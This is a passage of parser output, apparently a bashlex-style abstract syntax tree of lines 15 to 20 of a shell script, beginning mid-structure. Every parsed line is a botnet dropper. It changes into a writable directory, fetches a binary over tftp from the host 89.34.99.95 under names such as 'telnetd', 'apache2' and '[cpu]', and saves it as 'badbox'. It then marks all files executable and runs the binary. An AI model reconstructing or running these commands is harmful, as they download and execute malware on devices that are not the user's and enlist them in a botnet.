  OperatorNode(lineno=15, op=';', pos=(1497, 1498)),
  CommandNode(lineno=15, pos=(1498, 1506), parts=[
    WordNode(lineno=15, pos=(1498, 1506), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1507, 1633), parts=[
  CommandNode(lineno=16, pos=(1507, 1514), parts=[
    WordNode(lineno=16, pos=(1507, 1509), word='cd'),
    WordNode(lineno=16, pos=(1510, 1514), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1515, 1517)),
  CommandNode(lineno=16, pos=(1518, 1529), parts=[
    WordNode(lineno=16, pos=(1518, 1520), word='cd'),
    WordNode(lineno=16, pos=(1521, 1529), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1530, 1532)),
  CommandNode(lineno=16, pos=(1533, 1540), parts=[
    WordNode(lineno=16, pos=(1533, 1535), word='cd'),
    WordNode(lineno=16, pos=(1536, 1540), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1541, 1543)),
  CommandNode(lineno=16, pos=(1544, 1552), parts=[
    WordNode(lineno=16, pos=(1544, 1546), word='cd'),
    WordNode(lineno=16, pos=(1547, 1552), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1553, 1555)),
  CommandNode(lineno=16, pos=(1556, 1560), parts=[
    WordNode(lineno=16, pos=(1556, 1558), word='cd'),
    WordNode(lineno=16, pos=(1559, 1560), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1560, 1561)),
  CommandNode(lineno=16, pos=(1562, 1593), parts=[
    WordNode(lineno=16, pos=(1562, 1566), word='tftp'),
    WordNode(lineno=16, pos=(1567, 1578), word='89.34.99.95'),
    WordNode(lineno=16, pos=(1579, 1581), word='-c'),
    WordNode(lineno=16, pos=(1582, 1585), word='get'),
    WordNode(lineno=16, pos=(1586, 1593), word='htpdxmp'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1593, 1594)),
  CommandNode(lineno=16, pos=(1594, 1613), parts=[
    WordNode(lineno=16, pos=(1594, 1597), word='cat'),
    WordNode(lineno=16, pos=(1598, 1605), word='htpdxmp'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1607, 1613), word='badbox'), pos=(1606, 1613), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1613, 1614)),
  CommandNode(lineno=16, pos=(1614, 1624), parts=[
    WordNode(lineno=16, pos=(1614, 1619), word='chmod'),
    WordNode(lineno=16, pos=(1620, 1622), word='+x'),
    WordNode(lineno=16, pos=(1623, 1624), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1624, 1625)),
  CommandNode(lineno=16, pos=(1625, 1633), parts=[
    WordNode(lineno=16, pos=(1625, 1633), word='./badbox'),
  ]),
])
ListNode(lineno=17, pos=(1634, 1750), parts=[
  CommandNode(lineno=17, pos=(1634, 1641), parts=[
    WordNode(lineno=17, pos=(1634, 1636), word='cd'),
    WordNode(lineno=17, pos=(1637, 1641), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1642, 1644)),
  CommandNode(lineno=17, pos=(1645, 1656), parts=[
    WordNode(lineno=17, pos=(1645, 1647), word='cd'),
    WordNode(lineno=17, pos=(1648, 1656), word='/var/run'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1657, 1659)),
  CommandNode(lineno=17, pos=(1660, 1667), parts=[
    WordNode(lineno=17, pos=(1660, 1662), word='cd'),
    WordNode(lineno=17, pos=(1663, 1667), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1668, 1670)),
  CommandNode(lineno=17, pos=(1671, 1679), parts=[
    WordNode(lineno=17, pos=(1671, 1673), word='cd'),
    WordNode(lineno=17, pos=(1674, 1679), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1680, 1682)),
  CommandNode(lineno=17, pos=(1683, 1687), parts=[
    WordNode(lineno=17, pos=(1683, 1685), word='cd'),
    WordNode(lineno=17, pos=(1686, 1687), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1687, 1688)),
  CommandNode(lineno=17, pos=(1689, 1715), parts=[
    WordNode(lineno=17, pos=(1689, 1693), word='tftp'),
    WordNode(lineno=17, pos=(1694, 1705), word='89.34.99.95'),
    WordNode(lineno=17, pos=(1706, 1708), word='-c'),
    WordNode(lineno=17, pos=(1709, 1712), word='get'),
    WordNode(lineno=17, pos=(1713, 1715), word='sh'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1715, 1716)),
  CommandNode(lineno=17, pos=(1716, 1730), parts=[
    WordNode(lineno=17, pos=(1716, 1719), word='cat'),
    WordNode(lineno=17, pos=(1720, 1722), word='sh'),
    RedirectNode(lineno=17, output=
      WordNode(lineno=17, pos=(1724, 1730), word='badbox'), pos=(1723, 1730), type='>'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1730, 1731)),
  CommandNode(lineno=17, pos=(1731, 1741), parts=[
    WordNode(lineno=17, pos=(1731, 1736), word='chmod'),
    WordNode(lineno=17, pos=(1737, 1739), word='+x'),
    WordNode(lineno=17, pos=(1740, 1741), word='*'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(1741, 1742)),
  CommandNode(lineno=17, pos=(1742, 1750), parts=[
    WordNode(lineno=17, pos=(1742, 1750), word='./badbox'),
  ]),
])
ListNode(lineno=18, pos=(1751, 1873), parts=[
  CommandNode(lineno=18, pos=(1751, 1758), parts=[
    WordNode(lineno=18, pos=(1751, 1753), word='cd'),
    WordNode(lineno=18, pos=(1754, 1758), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1759, 1761)),
  CommandNode(lineno=18, pos=(1762, 1773), parts=[
    WordNode(lineno=18, pos=(1762, 1764), word='cd'),
    WordNode(lineno=18, pos=(1765, 1773), word='/var/run'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1774, 1776)),
  CommandNode(lineno=18, pos=(1777, 1784), parts=[
    WordNode(lineno=18, pos=(1777, 1779), word='cd'),
    WordNode(lineno=18, pos=(1780, 1784), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1785, 1787)),
  CommandNode(lineno=18, pos=(1788, 1796), parts=[
    WordNode(lineno=18, pos=(1788, 1790), word='cd'),
    WordNode(lineno=18, pos=(1791, 1796), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(1797, 1799)),
  CommandNode(lineno=18, pos=(1800, 1804), parts=[
    WordNode(lineno=18, pos=(1800, 1802), word='cd'),
    WordNode(lineno=18, pos=(1803, 1804), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1804, 1805)),
  CommandNode(lineno=18, pos=(1806, 1835), parts=[
    WordNode(lineno=18, pos=(1806, 1810), word='tftp'),
    WordNode(lineno=18, pos=(1811, 1822), word='89.34.99.95'),
    WordNode(lineno=18, pos=(1823, 1825), word='-c'),
    WordNode(lineno=18, pos=(1826, 1829), word='get'),
    WordNode(lineno=18, pos=(1830, 1835), word='[cpu]'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1835, 1836)),
  CommandNode(lineno=18, pos=(1836, 1853), parts=[
    WordNode(lineno=18, pos=(1836, 1839), word='cat'),
    WordNode(lineno=18, pos=(1840, 1845), word='[cpu]'),
    RedirectNode(lineno=18, output=
      WordNode(lineno=18, pos=(1847, 1853), word='badbox'), pos=(1846, 1853), type='>'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1853, 1854)),
  CommandNode(lineno=18, pos=(1854, 1864), parts=[
    WordNode(lineno=18, pos=(1854, 1859), word='chmod'),
    WordNode(lineno=18, pos=(1860, 1862), word='+x'),
    WordNode(lineno=18, pos=(1863, 1864), word='*'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(1864, 1865)),
  CommandNode(lineno=18, pos=(1865, 1873), parts=[
    WordNode(lineno=18, pos=(1865, 1873), word='./badbox'),
  ]),
])
ListNode(lineno=19, pos=(1874, 2000), parts=[
  CommandNode(lineno=19, pos=(1874, 1881), parts=[
    WordNode(lineno=19, pos=(1874, 1876), word='cd'),
    WordNode(lineno=19, pos=(1877, 1881), word='/tmp'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(1882, 1884)),
  CommandNode(lineno=19, pos=(1885, 1896), parts=[
    WordNode(lineno=19, pos=(1885, 1887), word='cd'),
    WordNode(lineno=19, pos=(1888, 1896), word='/var/run'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(1897, 1899)),
  CommandNode(lineno=19, pos=(1900, 1907), parts=[
    WordNode(lineno=19, pos=(1900, 1902), word='cd'),
    WordNode(lineno=19, pos=(1903, 1907), word='/mnt'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(1908, 1910)),
  CommandNode(lineno=19, pos=(1911, 1919), parts=[
    WordNode(lineno=19, pos=(1911, 1913), word='cd'),
    WordNode(lineno=19, pos=(1914, 1919), word='/root'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(1920, 1922)),
  CommandNode(lineno=19, pos=(1923, 1927), parts=[
    WordNode(lineno=19, pos=(1923, 1925), word='cd'),
    WordNode(lineno=19, pos=(1926, 1927), word='/'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1927, 1928)),
  CommandNode(lineno=19, pos=(1929, 1960), parts=[
    WordNode(lineno=19, pos=(1929, 1933), word='tftp'),
    WordNode(lineno=19, pos=(1934, 1945), word='89.34.99.95'),
    WordNode(lineno=19, pos=(1946, 1948), word='-c'),
    WordNode(lineno=19, pos=(1949, 1952), word='get'),
    WordNode(lineno=19, pos=(1953, 1960), word='apache2'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1960, 1961)),
  CommandNode(lineno=19, pos=(1961, 1980), parts=[
    WordNode(lineno=19, pos=(1961, 1964), word='cat'),
    WordNode(lineno=19, pos=(1965, 1972), word='apache2'),
    RedirectNode(lineno=19, output=
      WordNode(lineno=19, pos=(1974, 1980), word='badbox'), pos=(1973, 1980), type='>'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1980, 1981)),
  CommandNode(lineno=19, pos=(1981, 1991), parts=[
    WordNode(lineno=19, pos=(1981, 1986), word='chmod'),
    WordNode(lineno=19, pos=(1987, 1989), word='+x'),
    WordNode(lineno=19, pos=(1990, 1991), word='*'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(1991, 1992)),
  CommandNode(lineno=19, pos=(1992, 2000), parts=[
    WordNode(lineno=19, pos=(1992, 2000), word='./badbox'),
  ]),
])
ListNode(lineno=20, pos=(2001, 2127), parts=[
  CommandNode(lineno=20, pos=(2001, 2008), parts=[
    WordNode(lineno=20, pos=(2001, 2003), word='cd'),
    WordNode(lineno=20, pos=(2004, 2008), word='/tmp'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2009, 2011)),
  CommandNode(lineno=20, pos=(2012, 2023), parts=[
    WordNode(lineno=20, pos=(2012, 2014), word='cd'),
    WordNode(lineno=20, pos=(2015, 2023), word='/var/run'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2024, 2026)),
  CommandNode(lineno=20, pos=(2027, 2034), parts=[
    WordNode(lineno=20, pos=(2027, 2029), word='cd'),
    WordNode(lineno=20, pos=(2030, 2034), word='/mnt'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2035, 2037)),
  CommandNode(lineno=20, pos=(2038, 2046), parts=[
    WordNode(lineno=20, pos=(2038, 2040), word='cd'),
    WordNode(lineno=20, pos=(2041, 2046), word='/root'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2047, 2049)),
  CommandNode(lineno=20, pos=(2050, 2054), parts=[
    WordNode(lineno=20, pos=(2050, 2052), word='cd'),
    WordNode(lineno=20, pos=(2053, 2054), word='/'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2054, 2055)),
  CommandNode(lineno=20, pos=(2056, 2087), parts=[
    WordNode(lineno=20, pos=(2056, 2060), word='tftp'),
    WordNode(lineno=20, pos=(2061, 2072), word='89.34.99.95'),
    WordNode(lineno=20, pos=(2073, 2075), word='-c'),
    WordNode(lineno=20, pos=(2076, 2079), word='get'),
    WordNode(lineno=20, pos=(2080, 2087), word='telnetd'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2087, 2088)),
  CommandNode(lineno=20, pos=(2088, 2107), parts=[
    WordNode(lineno=20, pos=(2088, 2091), word='cat'),
    WordNode(lineno=20, pos=(2092, 2099), word='telnetd'),
    RedirectNode(lineno=20, output=
      WordNode(lineno=20, pos=(2101, 2107), word='badbox'), pos=(2100, 2107), type='>'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2107, 2108)),
  CommandNode(lineno=20, pos=(2108, 2118), parts=[
    WordNode(lineno=20, pos=(2108, 2113), word='chmod'),
    WordNode(lineno=20, pos=(2114, 2116), word='+x'),
    WordNode(lineno=20, pos=(2117, 2118), word='*'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2118, 2119)),
  CommandNode(lineno=20, pos=(2119, 2127), parts=[
    WordNode(lineno=20, pos=(2119, 2127), word='./badbox'),
  ]),
])
